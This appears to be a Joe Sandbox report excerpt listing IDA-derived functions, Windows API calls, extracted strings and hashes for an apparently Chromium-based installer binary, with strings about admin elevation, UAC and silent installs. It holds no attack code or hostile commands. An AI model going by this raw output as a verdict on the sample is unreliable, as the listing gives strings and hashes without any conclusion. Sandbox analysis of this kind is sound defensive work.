                                                                                                                        • Variations.FieldTriamParamsLogInvalidValue, xrefs: 008AE25F
                                                                                                                        • FieldTrialParams-value, xrefs: 008AE642
                                                                                                                        • LogInvalidValue, xrefs: 008AE50F
                                                                                                                        • FieldTrialParams-default, xrefs: 008AE682
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008AE59F
                                                                                                                        • . Falling back to default value of , xrefs: 008AE4C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_header$_strlen$CriticalExclusiveLockSection$AcquireEnterLeaveRelease
                                                                                                                        • String ID: into $ under feature $ with string value $. Falling back to default value of $..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Failed to parse field trial param $FieldTrialParams-default$FieldTrialParams-feature_name$FieldTrialParams-param_name$FieldTrialParams-value$LogInvalidValue$Variations.FieldTriamParamsLogInvalidValue$field_trial_params.cc
                                                                                                                        • API String ID: 1027699586-24245431
                                                                                                                        • Opcode ID: 00b1c058dac2ce538187e1fa9fe7b20e2580a3f5afb6283f0060f9335d1dbe32
                                                                                                                        • Instruction ID: 4dc0db7ed22c21ffbac9068df196009d896184aa1654daea8a15b9bc03bd8165
                                                                                                                        • Opcode Fuzzy Hash: 00b1c058dac2ce538187e1fa9fe7b20e2580a3f5afb6283f0060f9335d1dbe32
                                                                                                                        • Instruction Fuzzy Hash: CDB14971A04300ABE620EF58EC96F6A7764FF92718F04493CFC9597682E770A911C793
                                                                                                                        Function 008C4600 Relevance: 37.2, APIs: 7, Strings: 14, Instructions: 457libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(008446AD,00000000,00000022,008446AD,5750F189), ref: 008C4675
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 008C46CE
                                                                                                                        • GetLastError.KERNEL32(008446AD,5750F189), ref: 008C47BE
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 008C484D
                                                                                                                          • Part of subcall function 008C4C40: FindResourceW.KERNEL32(00000000,?,?,-00000001,008446AD,00000000,?,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C5E
                                                                                                                          • Part of subcall function 008C4C40: SizeofResource.KERNEL32(00000000,00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C6C
                                                                                                                          • Part of subcall function 008C4C40: LoadResource.KERNEL32(00000000,00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C7B
                                                                                                                          • Part of subcall function 008C4C40: LockResource.KERNEL32(00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C86
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 008C49C5
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008C4AFB
                                                                                                                        Strings
                                                                                                                        • TRUSTED_JSON, xrefs: 008C48E7, 008C4A10
                                                                                                                        • Attempting to GetTrustJsonFromModule at an invalid path: , xrefs: 008C47F6
                                                                                                                        • Failed to load module for GetTrustJsonFromModule: , xrefs: 008C4888
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008C4C09
                                                                                                                        • SIGNATURE_DAT, xrefs: 008C46B3, 008C4719
                                                                                                                        • Cannot find resource , xrefs: 008C4706, 008C49FD
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008C4C17
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008C4C26
                                                                                                                        • TRUSTED.JSON, xrefs: 008C48E2
                                                                                                                        • Verify error, xrefs: 008C4B33
                                                                                                                        • Cannot find key, xrefs: 008C4AC1
                                                                                                                        • SIGNATURE.DAT, xrefs: 008C46AE
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008C4C10
                                                                                                                        • GetTrustJsonFromModule, xrefs: 008C46EC, 008C47DE, 008C4870, 008C49E3, 008C4AA9, 008C4B1B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Resource$Load$FindLibraryLockSizeof
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds$Attempting to GetTrustJsonFromModule at an invalid path: $Cannot find key$Cannot find resource $Failed to load module for GetTrustJsonFromModule: $GetTrustJsonFromModule$SIGNATURE.DAT$SIGNATURE_DAT$TRUSTED.JSON$TRUSTED_JSON$Verify error
                                                                                                                        • API String ID: 1577874829-3182910857
                                                                                                                        • Opcode ID: bdbcff9e46e68f9d7b0ab563b34874314b744c6df1d378f1b703e6232b6b1e7b
                                                                                                                        • Instruction ID: 259836548ebf0d12dd86ca10a5470de4a9ee3fd66b1c96d16bce8f9ad18d4bb1
                                                                                                                        • Opcode Fuzzy Hash: bdbcff9e46e68f9d7b0ab563b34874314b744c6df1d378f1b703e6232b6b1e7b
                                                                                                                        • Instruction Fuzzy Hash: 5EF1A0706043409BDB20EB64D891F6A77A5FFD5714F04881CF989D7282EB70E989CBA3
                                                                                                                        Function 00848DD0 Relevance: 31.9, APIs: 6, Strings: 12, Instructions: 376COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _strlen.LIBCMT ref: 00848E0E
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00848EB1
                                                                                                                        • _strlen.LIBCMT ref: 00848EC6
                                                                                                                        • _strlen.LIBCMT ref: 00848FBC
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,0c0f0f0d-6434-4cfd-a5e9-23e9ca4d94b6,?,?,?), ref: 0084916B
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,fef32d6d-67e9-4654-b314-6c72098ff5d1,?,?,?), ref: 00849178
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen$CreateEvent$CurrentProcess
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$0c0f0f0d-6434-4cfd-a5e9-23e9ca4d94b6$<$@$butt$fake_browser_arc$fef32d6d-67e9-4654-b314-6c72098ff5d1$ked_$parent-installer-process-id$run-as-admin$setup-cmd-line$uac_declined
                                                                                                                        • API String ID: 1400174177-4058345832
                                                                                                                        • Opcode ID: fb3572de7e6acdd30d6027d44ea3b3418e958c94714794425fe1118aa61f3370
                                                                                                                        • Instruction ID: ef7f251e06982df285c1628309f3d48cddc75f57d9980e50d5e2ef1848a65f90
                                                                                                                        • Opcode Fuzzy Hash: fb3572de7e6acdd30d6027d44ea3b3418e958c94714794425fe1118aa61f3370
                                                                                                                        • Instruction Fuzzy Hash: D4E1D1B1D0036D9EDB21AFA4CC41BDEBBB5FF51310F154069E549E7282EBB05A84CB92
                                                                                                                        Function 00848A20 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 283COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen$CurrentProcess
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$Elevated run is necessary but silent instalation is requested - UAC will not be shown.$Found non install-switch:$NeedStartThisProcessAsAdmin$Run-as-admin functionality is already enabled.$User is not in admin group.$Windows version is not suitable for elevated restart.$run-as-admin$silent$uac-enabled
                                                                                                                        • API String ID: 84547671-1959935438
                                                                                                                        • Opcode ID: 6998c881373cf2a2bb047260f7186ddfb03fde7dc6758a22e31be398a426dc6f
                                                                                                                        • Instruction ID: 99668693777d14b0c1da535c2728bc703526d692db2eab45b255ab12abdcd547
                                                                                                                        • Opcode Fuzzy Hash: 6998c881373cf2a2bb047260f7186ddfb03fde7dc6758a22e31be398a426dc6f
                                                                                                                        • Instruction Fuzzy Hash: D99109B1A08359AFD710EE748C92F5FB694FF91718F044C29F996E72C2DFA099048693
                                                                                                                        Function 008BC460 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 398COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetDllDirectoryW.KERNEL32(0094335A), ref: 008BC484
                                                                                                                          • Part of subcall function 00930140: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00930177
                                                                                                                          • Part of subcall function 00930140: GetLastError.KERNEL32 ref: 00930181
                                                                                                                        • _strlen.LIBCMT ref: 008BC504
                                                                                                                        • _strlen.LIBCMT ref: 008BC59E
                                                                                                                        • _strlen.LIBCMT ref: 008BC861
                                                                                                                        Strings
                                                                                                                        • run-as-admin, xrefs: 008BC4FF, 008BC553, 008BC55A, 008BC56B
                                                                                                                        • spawned_in_protected_dir, xrefs: 008BC599, 008BC5F0, 008BC5F7, 008BC608, 008BC85C, 008BC8B5, 008BC8BC, 008BC8CD
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008BC9AD
                                                                                                                        • *.dll, xrefs: 008BC687
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008BC9B4
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008BC9A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen$DirectoryErrorFileLastModuleName
                                                                                                                        • String ID: *.dll$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$run-as-admin$spawned_in_protected_dir
                                                                                                                        • API String ID: 554357211-214805512
                                                                                                                        • Opcode ID: 8130442d3a916357c124d6e4c7cde5c33726db8bbad9f235d7b5dbd467329d3f
                                                                                                                        • Instruction ID: becfbe777f646b6ab1cbc7f0a873806f9fb69217517918e1ddd1149d95871dd8
                                                                                                                        • Opcode Fuzzy Hash: 8130442d3a916357c124d6e4c7cde5c33726db8bbad9f235d7b5dbd467329d3f
                                                                                                                        • Instruction Fuzzy Hash: BFD1D571E002699FDB21BB64CC9ABEE7764FF91304F1401B9E449E6242EB705F85CB92
                                                                                                                        Function 0089ECA0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 171COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000,?,?,SystemTemp,0000000A,?,00000000), ref: 0089EDBC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: ChromiumTemp$GetOrCreateSecureSystemTemp$GetSecureSystemTemp$PathExists$SystemTemp$SystemTemp$Temp$file_util_win.cc
                                                                                                                        • API String ID: 3188754299-2083047464
                                                                                                                        • Opcode ID: 4338b35e27c3cefc4dad49c471c88b869378e1db30ca15eaf6190cde5e365cf7
                                                                                                                        • Instruction ID: 16432105aa4801a651d11ff449cea21de87cb9e8389ac3a5e029630e5d8a71fb
                                                                                                                        • Opcode Fuzzy Hash: 4338b35e27c3cefc4dad49c471c88b869378e1db30ca15eaf6190cde5e365cf7
                                                                                                                        • Instruction Fuzzy Hash: 95510A71A04740A7DB10AF689C86BAFB794FFD5714F048A1DF9D593681EBB0A9088783
                                                                                                                        Function 008B6950 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008B6D3E
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B6D45, 008B6EBB
                                                                                                                        • FeatureList-feature-accessed-too-early, xrefs: 008B69F1
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008B6D4C
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008B6EAD
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B6EB4
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008B69C7
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008B6E9E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_header_strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds$FeatureList-feature-accessed-too-early
                                                                                                                        • API String ID: 218057889-998176601
                                                                                                                        • Opcode ID: a4eb297345ffdb24b3557aa7388c64f0f293c5b82968f26067e0d76633f89717
                                                                                                                        • Instruction ID: f817e8571d290a98de460143b7f6ee54cb20d5177fa62075dea5f19d5d2d013a
                                                                                                                        • Opcode Fuzzy Hash: a4eb297345ffdb24b3557aa7388c64f0f293c5b82968f26067e0d76633f89717
                                                                                                                        • Instruction Fuzzy Hash: 64110471A04208DBD710EF78EC86EEA3764FB85718F10013CE905D7392EB716C28D692
                                                                                                                        Function 008B00B0 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 357fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B03A2
                                                                                                                        • WriteFile.KERNEL32(?,?,FFFFFFFF,00000000), ref: 008B0462
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008B04D3
                                                                                                                        Strings
                                                                                                                        • LOG_FATAL, xrefs: 008B04ED
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B0487
                                                                                                                        • W, xrefs: 008B0293
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:323: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range, xrefs: 008B0471
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008B0478
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B046A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugFileInit_thread_headerOutputStringWrite
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\string_view:323: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range$LOG_FATAL$W
                                                                                                                        • API String ID: 2021787345-2015273307
                                                                                                                        • Opcode ID: 1024e51eb0e2077bd348fc9c1ffdf205003ccc54b8b6f5cd1b3e9b35845e6e05
                                                                                                                        • Instruction ID: 154e4b82411693ea09c61b21d25c16db73714fa690b15ea8c7b3e6621d6e658a
                                                                                                                        • Opcode Fuzzy Hash: 1024e51eb0e2077bd348fc9c1ffdf205003ccc54b8b6f5cd1b3e9b35845e6e05
                                                                                                                        • Instruction Fuzzy Hash: C0D187B1E042199FCB10DBA8D894AEFBBB4FF49718F040029E945E7352E771A946CF91
                                                                                                                        Function 0085AC00 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 209COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _strlen.LIBCMT ref: 0085AC18
                                                                                                                        • _strlen.LIBCMT ref: 0085ACA1
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A,?,?,00000000), ref: 0085AE2E
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000D), ref: 0085AE39
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FeaturePresentProcessor_strlen
